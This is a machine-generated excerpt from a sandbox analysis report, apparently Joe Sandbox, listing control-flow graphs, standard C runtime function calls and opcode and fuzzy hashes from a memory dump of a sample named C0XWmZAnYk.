                control_flow_graph 550 c36437-c36440 551 c36442-c36446 550->551 552 c36466 550->552 551->552 553 c36448-c36459 call c39636 551->553 554 c36468-c3646b 552->554 557 c3645b-c36460 call c35ba8 553->557 558 c3646c-c3647d call c39636 553->558 557->552 563 c36488-c3649a call c39636 558->563 564 c3647f-c36480 call c3158d 558->564 569 c364ac-c364cd call c35f4c call c36837 563->569 570 c3649c-c364aa call c3158d * 2 563->570 568 c36485-c36486 564->568 568->557 579 c364e2-c36500 call c3158d call c34edc call c34d82 call c3158d 569->579 580 c364cf-c364dd call c3557d 569->580 570->568 589 c36507-c36509 579->589 586 c36502-c36505 580->586 587 c364df 580->587 586->589 587->579 589->554
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 92a05c58a8c213eb5763c6b9727fbfaa66289382ee8e2776a3d5a6cca11416f7
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: 6721E436624600BFEB31BF65DC03E4B7BE4EF81760F60C029F895550A2EB329A50EB51

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 594 c33f16-c33f2f 595 c33f31-c33f3b call c35ba8 call c34c72 594->595 596 c33f49-c33f5e call c3bdc0 594->596 603 c33f40 595->603 596->595 602 c33f60-c33f63 596->602 604 c33f77-c33f7d 602->604 605 c33f65 602->605 606 c33f42-c33f48 603->606 609 c33f89-c33f9a call c40504 call c401a3 604->609 610 c33f7f 604->610 607 c33f67-c33f69 605->607 608 c33f6b-c33f75 call c35ba8 605->608 607->604 607->608 608->603 618 c33fa0-c33fac call c401cd 609->618 619 c34185-c3418f call c34c9d 609->619 610->608 611 c33f81-c33f87 610->611 611->608 611->609 618->619 624 c33fb2-c33fbe call c401f7 618->624 624->619 627 c33fc4-c33fcb 624->627 628 c3403b-c34046 call c402d9 627->628 629 c33fcd 627->629 628->606 636 c3404c-c3404f 628->636 631 c33fd7-c33ff3 call c402d9 629->631 632 c33fcf-c33fd5 629->632 631->606 637 c33ff9-c33ffc 631->637 632->628 632->631 638 c34051-c3405a call c40554 636->638 639 c3407e-c3408b 636->639 640 c34002-c3400b call c40554 637->640 641 c3413e-c34140 637->641 638->639 647 c3405c-c3407c 638->647 642 c3408d-c3409c call c40f40 639->642 640->641 650 c34011-c34029 call c402d9 640->650 641->606 651 c340a9-c340d0 call c40e90 call c40f40 642->651 652 c3409e-c340a6 642->652 647->642 650->606 657 c3402f-c34036 650->657 660 c340d2-c340db 651->660 661 c340de-c34105 call c40e90 call c40f40 651->661 652->651 657->641 660->661 666 c34113-c34122 call c40e90 661->666 667 c34107-c34110 661->667 670 c34124 666->670 671 c3414f-c34168 666->671 667->666 672 c34126-c34128 670->672 673 c3412a-c34138 670->673 674 c3413b 671->674 675 c3416a-c34183 671->675 672->673 676 c34145-c34147 672->676 673->674 674->641 675->641 676->641 677 c34149 676->677 677->671 678 c3414b-c3414d 677->678 678->641 678->671
                APIs
                • _memset.LIBCMT ref: 00C33F51
                  • Part of subcall function 00C35BA8: __getptd_noexit.LIBCMT ref: 00C35BA8
                • __gmtime64_s.LIBCMT ref: 00C33FEA
                • __gmtime64_s.LIBCMT ref: 00C34020
                • __gmtime64_s.LIBCMT ref: 00C3403D
                • __allrem.LIBCMT ref: 00C34093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C340AF
                • __allrem.LIBCMT ref: 00C340C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C340E4
                • __allrem.LIBCMT ref: 00C340FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C34119
                • __invoke_watson.LIBCMT ref: 00C3418A
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: 4b5fdaba1ae0d3a84547614394cfd408da0bcc937fa3cc689f0d1f21cec88d4e
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 0A711971A10B16ABE7289E79CC41B6EB3B9BF14364F144279F924D7281E770EE409BD0

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: c6f133961c23f4205947232dfc9dbd9fd7935593cc166b63912bbfb4d4b85450
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: 48412372924308BFDB00AFA4DD83B9E7BF4EF08314F20842DF91596192DBB59A45EB15

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 743 c384ab-c384d9 call c38477 748 c384f3-c3850b call c3158d 743->748 749 c384db-c384de 743->749 756 c38524-c3855a call c3158d * 3 748->756 757 c3850d-c3850f 748->757 750 c384e0-c384eb call c3158d 749->750 751 c384ed 749->751 750->749 750->751 751->748 768 c3856b-c3857e 756->768 769 c3855c-c38562 756->769 759 c38511-c3851c call c3158d 757->759 760 c3851e 757->760 759->757 759->760 760->756 773 c38580-c38587 call c3158d 768->773 774 c3858d-c38594 768->774 769->768 770 c38564-c3856a call c3158d 769->770 770->768 773->774 777 c385a3-c385ae 774->777 778 c38596-c3859d call c3158d 774->778 781 c385b0-c385bc 777->781 782 c385cb-c385cd 777->782 778->777 781->782 784 c385be-c385c5 call c3158d 781->784 784->782
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: 443541415042cf0227b62c424ec8af7df03566f56ff597481821b48e59fd5a5c
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: F0318E32A103509FDF21AF54FC8488977A4EB54321B48862AFD25572A1CFB46ECDAF94
                APIs
                • std::exception::exception.LIBCMT ref: 00C5FC1F
                  • Part of subcall function 00C4169C: std::exception::_Copy_str.LIBCMT ref: 00C416B5
                • __CxxThrowException@8.LIBCMT ref: 00C5FC34
                • std::exception::exception.LIBCMT ref: 00C5FC4D
                • __CxxThrowException@8.LIBCMT ref: 00C5FC62
                • std::regex_error::regex_error.LIBCPMT ref: 00C5FC74
                  • Part of subcall function 00C5F914: std::exception::exception.LIBCMT ref: 00C5F92E
                • __CxxThrowException@8.LIBCMT ref: 00C5FC82
                • std::exception::exception.LIBCMT ref: 00C5FC9B
                • __CxxThrowException@8.LIBCMT ref: 00C5FCB0
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: 9c9ea36e34246074ab500852fcff2a8f93e85a30d1d88f1bfb222064cc3db36c
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: F211DA79C0020DBBCB00FFA5D455CDDBB7CFA04344B458566BD5897241EB74E3888B94
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 2bbcd62c8f216ed67dee4d5d0af5e6d1b52140c0543bf3fd0352d612ddb5dd1d
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 601127B26105606EC66173F40C12EFF7AEC9F4A301F080069FE9DD1182DA185B05A3B2
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: 844529de82229fecf034c1ffd0fc31683d4cc59db94608525866ecea423a5c02
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: 54516B71D40219EBDB10EBA5DC86FEFBBB8FF04704F140025FA05B6180EB746A019BA5
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: dccab86946b2023bb16481ecec76138d4579210f5309c872506c4b458486a202
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: BC519FB1E40209EBDF11DFA1DC46FEEBBB8FB05704F100029F915B6191D7B4AA469BA4
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: c7249250d2a4366a3bfb04ec159c1cf1dcd9c25d11be4f6051c8201807152b43
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: CB517071E40209ABDF11DFA1DC46FEFBBB8FB05704F200129F905B6181E774AA069BA4
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 17e9d8f17c3ea6f0365c27f25b39089a5a7733ed4f8de02bf40dab73be3fae46
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: 3F317B3AA117216FDB217B64DC02B6F77D49F46B26F100015FD14EB2C1DB748E88A7A8
                APIs
                • __getptd_noexit.LIBCMT ref: 00CD66DD
                  • Part of subcall function 00C359BF: __calloc_crt.LIBCMT ref: 00C359E2
                  • Part of subcall function 00C359BF: __initptd.LIBCMT ref: 00C35A04
                • __calloc_crt.LIBCMT ref: 00CD6700
                • __get_sys_err_msg.LIBCMT ref: 00CD671E
                • __invoke_watson.LIBCMT ref: 00CD673B
                • __get_sys_err_msg.LIBCMT ref: 00CD676D
                • __invoke_watson.LIBCMT ref: 00CD678B
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: a9e494306f732e99642c5e61f15d22cf6e8e97b7db9a11f0665b0235a87481c8
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 0211C4316016186BEB257A259C42ABE739CDF00764F110427FF18A6342E635DE01A6D4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 81faf4732af92632da3bbd33f9ce2adf6efc8de924a841eb5f48d6cf9bfbece5
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 42E15D71D00229ABDF24DFA0DD89FEEB7B8BF04704F144069E609E6590EB74AA85CF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: d3b2aa20fed2e71e533cd502b2778c36b8b21a102dc73425c50639b188daee1d
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: 8B91C071D00258DBEF20CFA0DC45BEEBBB4AF06304F244069E416772C1DBB65A89EB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: 22b6db85ec9c79e6b30e690dcc2f84a71594cadc78b03d9396d4cc2b45177b0d
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 5B212732628608BEEB00ABA4AC46BBE33ACDB44350F604165F918C7190FB71EE4096E4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 9070b7e112751f4137ed7f22c313a5643a7d9f65c9c90102fef93be8a4a79ff8
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: AAF0ED78698750A5F7217750BC27B857E917B31B08F104088E2182E2E5D3FD378CA79A
                APIs
                • std::exception::exception.LIBCMT ref: 00C5FBF1
                  • Part of subcall function 00C4169C: std::exception::_Copy_str.LIBCMT ref: 00C416B5
                • __CxxThrowException@8.LIBCMT ref: 00C5FC06
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: ea50b5269d5a9e43806c0600bd08d070ee0c0a9cc234722d5fb711c8c4a4d44c
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: BED067B5C0020CBBCB00EFA5D45ACDDBBB8AA04344B058466BD5497241EA74E3899B94
                APIs
                  • Part of subcall function 00C3197D: __wfsopen.LIBCMT ref: 00C31988
                • _fgetws.LIBCMT ref: 00C1D15C
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: aec85c286c235cfd3de7fffa4e8e2c02729c7a82673ff5d44195d8a08109d42b
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: 0091E372D00319ABCF20DFA4CC457EEB7B4BF05310F640529E826A3251E775AE84DB92
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: e7c69592e4e32b89a63ec305867418e017ed31addb9fc048b53ef51e626b42d8
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: 30A173B1C00258DBEF11EFD4DC46BDEBB75AF15304F140028E40677292D7B65A89EBA6
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: 532ab9c3c255cbb8d3653beefbaac777c06503f581d5c9b9ade8862ce59f62e5
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: C951C430A2030A9BDF299F69D8846AEF7B5EF40324F248729F876962D0D7709E51DB44
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: a0814edc2ad35bd11dea442c52baefa76be0ee7da729a0fc9826f06fb0c477f5
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: 7D017B3A04014ABBCF125E84CC19DEE3F62BF28346F088414FE2858430D236CAB5BB85
                APIs
                • ___BuildCatchObject.LIBCMT ref: 00CD7A4B
                  • Part of subcall function 00CD8140: ___BuildCatchObjectHelper.LIBCMT ref: 00CD8172
                  • Part of subcall function 00CD8140: ___AdjustPointer.LIBCMT ref: 00CD8189
                • _UnwindNestedFrames.LIBCMT ref: 00CD7A62
                • ___FrameUnwindToState.LIBCMT ref: 00CD7A74
                • CallCatchBlock.LIBCMT ref: 00CD7A98
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: af78a84371a7c19e91b3855d1fb32e0c85b59728cce24cc27b638f08311ac9b6
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: B001E932000109BBCF12AF55CD05EDE7BBAFF48754F158116FE1866221D732E961EBA0